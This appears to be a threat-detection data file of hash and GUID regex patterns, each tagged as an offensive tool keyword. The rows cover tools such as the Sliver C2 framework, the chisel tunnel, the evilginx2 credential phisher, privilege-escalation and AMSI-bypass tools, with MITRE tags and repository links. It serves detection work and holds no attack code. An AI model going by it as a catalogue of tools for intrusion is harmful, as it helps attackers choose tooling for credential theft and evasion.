"*c6ffad5c09f5fb6fe7241d3fe9c9cd968ceea15e483a180ac45bd0b4e15d7bcd*",".{0,1000}c6ffad5c09f5fb6fe7241d3fe9c9cd968ceea15e483a180ac45bd0b4e15d7bcd.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*c708b83f-4167-4b4c-a1db-d2011ecb3200*",".{0,1000}c708b83f\-4167\-4b4c\-a1db\-d2011ecb3200.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c*",".{0,1000}c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*c730a89142b73d047b4387f6f3f0d8dfacef57a2e4945a0a942cc72f0bd05253*",".{0,1000}c730a89142b73d047b4387f6f3f0d8dfacef57a2e4945a0a942cc72f0bd05253.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*C73A4893-A5D1-44C8-900C-7B8850BBD2EC*",".{0,1000}C73A4893\-A5D1\-44C8\-900C\-7B8850BBD2EC.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*c786890a660e4bca317ce667bc660504f8167a5d5965867d748ed02d0caa5046*",".{0,1000}c786890a660e4bca317ce667bc660504f8167a5d5965867d748ed02d0caa5046.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*c794d9b0bef6c7d8838f5130e2e0ae4c8bed3ec35cfb9bf502520dcfab38bde2*",".{0,1000}c794d9b0bef6c7d8838f5130e2e0ae4c8bed3ec35cfb9bf502520dcfab38bde2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c7985c82769ce2d6d68e3ed3926df1bc47523990c56cfa1ebe3e511e4b96a903*",".{0,1000}c7985c82769ce2d6d68e3ed3926df1bc47523990c56cfa1ebe3e511e4b96a903.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*c7bbfa266cc73f87a47186afadea101ceb03f759cf4b927a25dd1004d56ea07e*",".{0,1000}c7bbfa266cc73f87a47186afadea101ceb03f759cf4b927a25dd1004d56ea07e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c7c0c7e68bcc0ce7fbb15505434740e0528ab1240eeb8c3a123c3d84b8f6eefa*",".{0,1000}c7c0c7e68bcc0ce7fbb15505434740e0528ab1240eeb8c3a123c3d84b8f6eefa.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c7d0e470542ece3342535057e01e84b962b19959e5142aa61633f49ebaa52775*",".{0,1000}c7d0e470542ece3342535057e01e84b962b19959e5142aa61633f49ebaa52775.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*C7E4B529-6372-449A-9184-74E74E432FE8*",".{0,1000}C7E4B529\-6372\-449A\-9184\-74E74E432FE8.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","3","217","37","2023-11-29T21:58:34Z","2023-08-05T19:24:36Z" "*C7F1F871-8045-4414-9DC3-20F8AA42B4A1*",".{0,1000}C7F1F871\-8045\-4414\-9DC3\-20F8AA42B4A1.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*c7ffb81b3cd5cfcfe18363f998cd64428423814d5a8713d89e7992941884587d*",".{0,1000}c7ffb81b3cd5cfcfe18363f998cd64428423814d5a8713d89e7992941884587d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*c80284ccc6e7c2dab2845923cf4eb2eb02b87292df93f65fd1c54ec726b537fc*",".{0,1000}c80284ccc6e7c2dab2845923cf4eb2eb02b87292df93f65fd1c54ec726b537fc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c821704956c03e7edc23f0eab92bb7ecb668cf34016c523101681c608645da67*",".{0,1000}c821704956c03e7edc23f0eab92bb7ecb668cf34016c523101681c608645da67.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c8273217f19cd8f6f693c350dea5bd6fff1ced10bf83174bbabab4656579c3cb*",".{0,1000}c8273217f19cd8f6f693c350dea5bd6fff1ced10bf83174bbabab4656579c3cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c83cac1c4228e554b93ead6aa834427b52f420dd0beda7d7130dbf565fc3ee14*",".{0,1000}c83cac1c4228e554b93ead6aa834427b52f420dd0beda7d7130dbf565fc3ee14.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c8458f30f7c976ba1be9cb1c1175b1f0d32aea6fdeb3f62ab911ea77713ede63*",".{0,1000}c8458f30f7c976ba1be9cb1c1175b1f0d32aea6fdeb3f62ab911ea77713ede63.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*C8482002-F594-4C28-9C46-960B036540A8*",".{0,1000}C8482002\-F594\-4C28\-9C46\-960B036540A8.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*c850818a6b19486dae2a4c370797cbb4fa61a4ebd35cba8e94a60b54c4499c8b*",".{0,1000}c850818a6b19486dae2a4c370797cbb4fa61a4ebd35cba8e94a60b54c4499c8b.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*c85c00d64c49d48f8b3cd34210e4604ac10853758e206bd6f5aa6f9ee2d19b3e*",".{0,1000}c85c00d64c49d48f8b3cd34210e4604ac10853758e206bd6f5aa6f9ee2d19b3e.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*c86b6630f868d20303e940cd8f1a8805f1013bc567938a79cedb318b07f5f498*",".{0,1000}c86b6630f868d20303e940cd8f1a8805f1013bc567938a79cedb318b07f5f498.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*c86c8f8a69c07fbec8dd650c6604bf0c9876261f*",".{0,1000}c86c8f8a69c07fbec8dd650c6604bf0c9876261f.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*c87bec6a236d81bed01df7c7e576308bf421d4cd3afa826a3f439a422a888fb9*",".{0,1000}c87bec6a236d81bed01df7c7e576308bf421d4cd3afa826a3f439a422a888fb9.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*C88D7583-254F-4BE6-A9B9-89A5BB52E679*",".{0,1000}C88D7583\-254F\-4BE6\-A9B9\-89A5BB52E679.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","22663","2991","2024-03-15T06:32:42Z","2013-07-28T05:35:33Z" "*c8bdc5ce227d167f87797e8f7b3d91d24cd40c0925f5f6406085ad8cdf455617*",".{0,1000}c8bdc5ce227d167f87797e8f7b3d91d24cd40c0925f5f6406085ad8cdf455617.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*C8C12FA3-717F-4D35-B8B3-2E7F7A124E7C*",".{0,1000}C8C12FA3\-717F\-4D35\-B8B3\-2E7F7A124E7C.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*c8c738978ad5131ed15b42f0609008d63513a4b402798b1de20941f4a5993219*",".{0,1000}c8c738978ad5131ed15b42f0609008d63513a4b402798b1de20941f4a5993219.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*C8D738E6-8C30-4715-8AE5-6A8FBFE770A7*",".{0,1000}C8D738E6\-8C30\-4715\-8AE5\-6A8FBFE770A7.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","8","3","202","33","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z" "*c8e190fea8360f02cf9cba596c62d17498e016ec1339b314131a1b828d21b090*",".{0,1000}c8e190fea8360f02cf9cba596c62d17498e016ec1339b314131a1b828d21b090.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*C91C8B29-82DF-49C0-986B-81182CF84E42*",".{0,1000}C91C8B29\-82DF\-49C0\-986B\-81182CF84E42.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*c922f6e29c844d15946890f4872230dd9469dd0cce084e913a8df3ef3ea5d126*",".{0,1000}c922f6e29c844d15946890f4872230dd9469dd0cce084e913a8df3ef3ea5d126.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c923b2051d3e822e390e80c7e8d56f6b2cc62ae6688ca73745684b57154f3ecb*",".{0,1000}c923b2051d3e822e390e80c7e8d56f6b2cc62ae6688ca73745684b57154f3ecb.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*c929214fbc050208831b18c088d33e0db1ffcd2f26103bc3a69b0081683db1c8*",".{0,1000}c929214fbc050208831b18c088d33e0db1ffcd2f26103bc3a69b0081683db1c8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c92eaefade39fccf3a8926ae8b579333b37a58bc15e4c536eeb16b6bdb97f5c8*",".{0,1000}c92eaefade39fccf3a8926ae8b579333b37a58bc15e4c536eeb16b6bdb97f5c8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c9448628b8a4a715f780bf821eab6e39962a774ecdcf808628ea6ef952372722*",".{0,1000}c9448628b8a4a715f780bf821eab6e39962a774ecdcf808628ea6ef952372722.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*c96ef7d84ab7d43b03330daf4e78c11aa9407662f4a18d1824fa1506694c8c56*",".{0,1000}c96ef7d84ab7d43b03330daf4e78c11aa9407662f4a18d1824fa1506694c8c56.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*c97e3b0e4180217fe46b36d70163c750a40ed76d402ca6c1784e3d8e6c3b22b0*",".{0,1000}c97e3b0e4180217fe46b36d70163c750a40ed76d402ca6c1784e3d8e6c3b22b0.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*c9a56e555aa154cca1e25d511e2201cc522307ca09b54346860d375447ec7929*",".{0,1000}c9a56e555aa154cca1e25d511e2201cc522307ca09b54346860d375447ec7929.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*c9cd5c71f55be91b6f64f93e17d7dd2a3fa9b66dda9b9c11bf4140c66f18ed39*",".{0,1000}c9cd5c71f55be91b6f64f93e17d7dd2a3fa9b66dda9b9c11bf4140c66f18ed39.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c9da78ad6095451caaf4dc686005d5145494e9f7be36514423a111242ff523f2*",".{0,1000}c9da78ad6095451caaf4dc686005d5145494e9f7be36514423a111242ff523f2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c9f355952a93723f4e6b471380f35a1315af1d2de40524ee0bdd252deded71d2*",".{0,1000}c9f355952a93723f4e6b471380f35a1315af1d2de40524ee0bdd252deded71d2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c9f72eb2e307e3a7689a46f5e2e6c87bfe8f76c977b37e689b4ff3b1895b731e*",".{0,1000}c9f72eb2e307e3a7689a46f5e2e6c87bfe8f76c977b37e689b4ff3b1895b731e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ca081dfda125f3b14589e205288777bdc209941e50cebb2298262adcd5c76c86*",".{0,1000}ca081dfda125f3b14589e205288777bdc209941e50cebb2298262adcd5c76c86.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*ca12dd05b0f8cff9da1c8e088808a8c6e3218eefa22c0d92469abda3888dab4d*",".{0,1000}ca12dd05b0f8cff9da1c8e088808a8c6e3218eefa22c0d92469abda3888dab4d.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","796","162","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" "*ca16e87c3ffc6496a23618ff180b0a57ec07e290207d47e8dc7489a208bf4d85*",".{0,1000}ca16e87c3ffc6496a23618ff180b0a57ec07e290207d47e8dc7489a208bf4d85.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" 